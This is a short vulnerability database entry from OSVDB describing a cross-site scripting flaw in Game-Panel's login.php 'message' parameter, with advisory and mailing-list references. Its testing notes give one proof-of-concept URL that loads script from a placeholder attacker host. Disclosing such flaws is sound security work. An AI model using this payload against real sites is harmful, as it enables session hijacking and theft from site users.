Game-Panel login.php message Variable XSS

2006-03-04T13:47:37
ID OSVDB:23712
Type osvdb
Reporter OSVDB
Modified 2006-03-04T13:47:37

Description

Manual Testing Notes

http://[target]/login.php?message=%3CSCRIPT%20SRC=http://[attacker]/xss.js%3E%3C/SCRIPT%3E

References:

Vendor URL: http://game-panel.com/ Secunia Advisory ID:19143 Other Advisory URL: http://notlegal.ws/gamepanel.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0655.html